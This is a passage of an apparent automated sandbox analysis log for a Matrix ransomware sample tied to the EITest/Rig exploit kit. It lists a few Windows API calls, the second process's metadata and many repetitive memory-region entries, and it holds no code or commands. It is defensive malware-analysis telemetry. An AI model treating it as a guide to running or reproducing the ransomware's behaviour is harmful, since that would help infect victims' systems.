[89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0086.590] ResumeThread (hThread=0x48) returned 0x1 [0086.590] CloseHandle (hObject=0x48) returned 1 [0086.590] CloseHandle (hObject=0x4c) returned 1 [0086.590] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0086.591] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0086.591] ExitProcess (uExitCode=0x0) Process: id = "2" image_name = "2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe" filename = "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe" page_root = "0x7ea16640" os_pid = "0xa88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa78" cmd_line = "\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 173 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 174 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 175 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 176 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 177 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 178 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 179 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 180 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 181 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 182 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 183 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 184 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 185 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 186 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 187 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 188 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 189 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 190 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 191 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 192 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 193 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 194 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 195 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 196 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 197 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 198 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 199 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 200 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 201 start_va = 0x520000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 202 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 203 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 204 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 205 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 206 start_va = 0x5f0000 end_va = 0x6f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 207 start_va = 0x700000 end_va = 0x12fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 208 start_va = 0x1300000 end_va = 0x143ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 209 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 210 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 211 start_va = 0x1440000 end_va = 0x15bffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 212 start_va = 0x15c0000 end_va = 0x188efff entry_point = 0x15c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 213 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 214 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 284 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 285 start_va = 0x1890000 end_va = 0x1c9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001890000" filename = "" Region: id = 286 start_va = 0x1ca0000 end_va = 0x20affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ca0000" filename = "" Region: id = 287 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 288 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 289 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 290 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 291 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 292 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 293 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 294 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 295 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 296 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 297 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 298 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 299 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 300 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 301 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 302 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 303 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 304 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 305 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 306 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 307 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 308 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 309 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 310 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 311 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 312 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 313 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 314 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 315 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 316 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 317 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 318 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 319 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 320 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 321 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 322 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 323 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 324 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 325 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 326 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 327 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 328 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 329 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 330 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 331 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 332 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 333 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 334 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 335 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 336 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 337 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 338 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 339 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 340 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 370 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 371 start_va = 0x1890000 end_va = 0x1c9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001890000" filename = "" Region: id = 372 start_va = 0x1ca0000 end_va = 0x20affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ca0000" filename = "" Region: id = 373 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 374 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 375 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 376 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 377 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 378 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 379 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 380 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 381 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 382 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 383 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 384 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 385 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 386 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 387 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 388 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 389 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 390 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 391 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 392 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 393 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 394 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 395 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 396 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 397 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 398 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 399 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 400 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 401 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 402 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 403 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 404 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 405 start_va = 0x1d0000 end_va = 0x1e0fff 